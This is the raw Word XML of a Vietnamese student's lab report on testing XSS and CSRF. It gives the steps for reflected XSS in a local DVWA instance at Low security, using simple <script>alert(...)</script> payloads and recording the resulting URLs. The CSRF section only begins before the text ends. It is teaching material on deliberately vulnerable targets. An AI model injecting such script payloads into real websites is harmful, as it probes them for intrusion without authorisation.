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2091" w14:textId="75363235" w:rsidR="008079C0" w:rsidRPr="00AE25B9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5B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO BÀI THỰC HÀNH SỐ </w:t>
      </w:r>
      <w:r w:rsidR="00830631" w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD44A0" w14:textId="77777777" w:rsidR="008079C0" w:rsidRPr="00AE25B9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5B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">KIỂM THỬ LỖ HỔNG </w:t>
      </w:r>
      <w:r w:rsidR="001D4A4C" w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>XSS và CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE81D1" w14:textId="2A3B1C64" w:rsidR="00C27FFB" w:rsidRPr="002F5627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D2DA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1050080289_Trần Anh Tuấn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B0B418" w14:textId="77777777" w:rsidR="00256B2A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1: Kiểm thử XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E295B1" w14:textId="06DCC625" w:rsidR="00BF2D04" w:rsidRPr="00316734" w:rsidRDefault="00CC3443" w:rsidP="0031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kiểm thử lỗ hổng XSS trên website</w:t>
      </w:r>
      <w:r w:rsidR="00BF2D04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: chọn 1 trong các trang sau để thử nghiệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7F4D80" w14:textId="73EF2166" w:rsidR="00316734" w:rsidRDefault="00316734" w:rsidP="00316734">
      <w:p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6" w:history="1">
        <w:r w:rsidRPr="008C0B22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13D472B4" w14:textId="7ACD0F0C" w:rsidR="001E2902" w:rsidRDefault="00316734" w:rsidP="00316734">
      <w:p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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00256B2A" w:rsidRPr="00316734">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Câu</w:t>
      </w:r>
      <w:r w:rsidR="001E2902" w:rsidRPr="0031673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A3B2FBB" w14:textId="77777777" w:rsidR="005A67FF" w:rsidRPr="005A67FF" w:rsidRDefault="005A67FF" w:rsidP="005A67FF">
      <w:p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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bước 1: Truy cập XSS (Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2CF42" w14:textId="77777777" w:rsidR="005A67FF" w:rsidRPr="005A67FF" w:rsidRDefault="005A67FF" w:rsidP="005A67FF">
      <w:pPr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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trong DVWA, nhấp vào XSS (Reflected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5E4E6" w14:textId="77777777" w:rsidR="005A67FF" w:rsidRPr="005A67FF" w:rsidRDefault="005A67FF" w:rsidP="005A67FF">
      <w:pPr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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bạn sẽ thấy một ô nhập liệu với nhãn “What’s your name?” và nút Submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009307A4" w14:textId="4C2296BE" w:rsidR="00DE43CF" w:rsidRDefault="00DE43CF" w:rsidP="00316734">
      <w:p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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FDD9ED" wp14:editId="7C461C16">
            <wp:extent cx="6191250" cy="1490345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180882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17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3936" w14:textId="77777777" w:rsidR="004B5029" w:rsidRPr="005A67FF" w:rsidRDefault="004B5029" w:rsidP="004B5029">
      <w:p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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bước 2: Kiểm tra đầu vào đơn giản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034D669" w14:textId="77777777" w:rsidR="004B5029" w:rsidRPr="005A67FF" w:rsidRDefault="004B5029" w:rsidP="004B5029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhập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A67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào ô nhập liệu, nhấn Submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612557B" w14:textId="7C03D055" w:rsidR="004B5029" w:rsidRPr="005A67FF" w:rsidRDefault="004B5029" w:rsidP="004B5029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Quan sát URL: http://localhost/dvwa/vulnerabilities/xss_r/?name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0289</w:t>
      </w:r>
      <w:r w:rsidRPr="005A67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486639A2" w14:textId="31A76F67" w:rsidR="004B5029" w:rsidRPr="004B5029" w:rsidRDefault="004B5029" w:rsidP="004B5029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA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67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra xem test có xuất hiện trong nội dung trang hay không (thường hiển thị dưới dạng “Hello </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0289</w:t>
      </w:r>
      <w:r w:rsidRPr="005A67FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7432E" w14:textId="77777777" w:rsidR="004B5029" w:rsidRDefault="004B5029" w:rsidP="00316734">
      <w:p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</w:p>
    <w:p w14:paraId="61BD0F25" w14:textId="278CF923" w:rsidR="004B5029" w:rsidRDefault="004B5029" w:rsidP="00316734">
      <w:p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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="663E8576" wp14:editId="4D144F18">
            <wp:extent cx="6191250" cy="3834130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190170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89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9819" w14:textId="1EAFAC0F" w:rsidR="004B5029" w:rsidRDefault="004B5029" w:rsidP="00316734">
      <w:p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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54687F09" wp14:editId="58B27D85">
            <wp:extent cx="6191250" cy="1414145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44252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41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1548" w14:textId="5B1CF9C6" w:rsidR="00856C7B" w:rsidRPr="00856C7B" w:rsidRDefault="00856C7B" w:rsidP="00856C7B">
      <w:p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r w:rsidRPr="00856C7B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00856C7B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Chèn MSSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE45D32" w14:textId="77777777" w:rsidR="00856C7B" w:rsidRPr="00856C7B" w:rsidRDefault="00856C7B" w:rsidP="00856C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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r w:rsidRPr="00856C7B"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  <w:t xml:space="preserve">Nhập &lt;script&gt;alert('0289');&lt;/script&gt; vào ô nhập liệu, nhấn </w:t>
      </w:r>
      <w:r w:rsidRPr="00856C7B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00856C7B"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  <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D83289" w14:textId="77777777" w:rsidR="00856C7B" w:rsidRPr="00856C7B" w:rsidRDefault="00856C7B" w:rsidP="00856C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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r w:rsidRPr="00856C7B"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  <w:t>Kết quả: Một cửa sổ thông báo chứa 0289 xuất hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061796DA" w14:textId="77777777" w:rsidR="00856C7B" w:rsidRPr="00856C7B" w:rsidRDefault="00856C7B" w:rsidP="00856C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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r w:rsidRPr="00856C7B"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  <w:t>Ghi lại: URL là http://localhost/dvwa/vulnerabilities/xss_r/?name=&lt;script&gt;alert('0289');&lt;/script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A285A" w14:textId="77777777" w:rsidR="00856C7B" w:rsidRDefault="00856C7B" w:rsidP="00316734">
      <w:p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</w:p>
    <w:p w14:paraId="677E13D0" w14:textId="6C5E705C" w:rsidR="008A2D80" w:rsidRDefault="008A2D80" w:rsidP="00316734">
      <w:p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</w:p>
    <w:p w14:paraId="74FF223F" w14:textId="584683CC" w:rsidR="006B55B0" w:rsidRDefault="006B55B0" w:rsidP="00316734">
      <w:p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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243B172E" wp14:editId="44E4D670">
            <wp:extent cx="6191250" cy="2048510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="103926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64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C83A" w14:textId="5A4123C8" w:rsidR="004953F1" w:rsidRPr="00316734" w:rsidRDefault="004953F1" w:rsidP="00316734">
      <w:p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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10068407" wp14:editId="6503C83F">
            <wp:extent cx="5915025" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="41943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36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EEC2" w14:textId="29499957" w:rsidR="00BF4FAA" w:rsidRDefault="00BF4FAA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</w:p>
    <w:p w14:paraId="63768E11" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bước 1: Truy cập XSS (Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56351E8E" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vào lại mục XSS (Reflected), đảm bảo mức bảo mật là Low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5296F37E" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bước 2: Kiểm tra đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04080F81" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nhập Trần Anh Tuấn vào ô nhập liệu, nhấn Submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44477C77" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL: http://localhost/dvwa/vulnerabilities/xss_r/?name=Trần+Anh+Tuấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057EA857" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kiểm tra: “Hello Trần Anh Tuấn” xuất hiện trên trang.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29202E24" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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</w:p>
    <w:p w14:paraId="00D41145" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="0094604D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53433EF5" w14:textId="7E3C9B02" w:rsidR="004D49F1" w:rsidRDefault="004D49F1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397F4" wp14:editId="51CEF3FE">
            <wp:extent cx="6191250" cy="2779395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="33420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00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A7A" w14:textId="77777777" w:rsidR="00794653" w:rsidRDefault="004D49F1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DF334B1" wp14:editId="17A941F8">
            <wp:extent cx="5496983" cy="5339685"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="131691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10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9896" cy="53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98F1" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C09AC79" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 3: Chèn mã JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A6EA8" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nhập &lt;script&gt;alert('Trần Anh Tuấn');&lt;/script&gt; vào ô nhập liệu, nhấn Submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3FA06" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="008C1C9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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết quả: Một cửa sổ thông báo chứa Trần Anh Tuấn xuất hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010C32E8" w14:textId="77AEE66E" w:rsidR="008C1C95" w:rsidRPr="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457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1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL: http://localhost/dvwa/vulnerabilities/xss_r/?name=&lt;script&gt;alert('Trần Anh Tuấn');&lt;/script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A394E8" w14:textId="1E93F946" w:rsidR="00C22DD8" w:rsidRDefault="00C22DD8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CEAEF9" wp14:editId="5F4931E7">
            <wp:extent cx="6191250" cy="2077085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50334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41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2641" w14:textId="02D7F03C" w:rsidR="00177820" w:rsidRDefault="00177820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27DD61" wp14:editId="4D46FE41">
            <wp:extent cx="6191250" cy="2518410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74159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90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788B" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE15274" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F3FE74" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702BCF5C" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494A53BC" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F59B1A" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DA8980" w14:textId="77777777" w:rsidR="008C1C95" w:rsidRDefault="008C1C95" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47643B9B" w14:textId="1A4C2956" w:rsidR="00F525CE" w:rsidRDefault="00F525CE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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36726860" w14:textId="5A917608" w:rsidR="008C1C95" w:rsidRDefault="008C1C95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969E846" wp14:editId="3DF09C61">
            <wp:extent cx="6191250" cy="1414145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131074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41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0B58" w14:textId="42995C72" w:rsidR="00101F8F" w:rsidRDefault="00101F8F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07C62F9" wp14:editId="2AB7529A">
            <wp:extent cx="6191250" cy="3834130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="149438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89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34BD" w14:textId="77777777" w:rsidR="000F0BC4" w:rsidRDefault="000F0BC4" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F83A8F8" w14:textId="43A1F798" w:rsidR="00DD25D3" w:rsidRDefault="00DD25D3" w:rsidP="00B457F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141BB5FE" w14:textId="0BA710A2" w:rsidR="004F2A41" w:rsidRDefault="004F2A41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35CD67" wp14:editId="6215A4E2">
            <wp:extent cx="4667250" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="124615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57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DFBC" w14:textId="5C5982C2" w:rsidR="000F0BC4" w:rsidRDefault="003023BA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FA2B68" wp14:editId="2F2A89A8">
            <wp:extent cx="6191250" cy="4516120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74822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20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C88" w14:textId="1A0167D0" w:rsidR="003023BA" w:rsidRDefault="003023BA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F846BE" wp14:editId="198BC4F3">
            <wp:extent cx="6191250" cy="2593340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="156590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057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22BE" w14:textId="77777777" w:rsidR="00AE43CD" w:rsidRDefault="00AE43CD" w:rsidP="00316734">
      <w:p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</w:p>
    <w:p w14:paraId="56F6E3B2" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Phần 2: Kiểm thử CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A0272" w14:textId="77777777" w:rsidR="00AE25B9" w:rsidRPr="00AE25B9" w:rsidRDefault="00AE25B9" w:rsidP="00AE25B9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b/>
          <w:bCs/>
          <w:color w:val="141414"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Website kiểm thử</w:t>
      </w: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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AE25B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://php.testsparker.com</w:t>
        </w:r>
      </w:hyperlink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br/>
      </w:r>
      <w:r w:rsidRPr="00AE25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
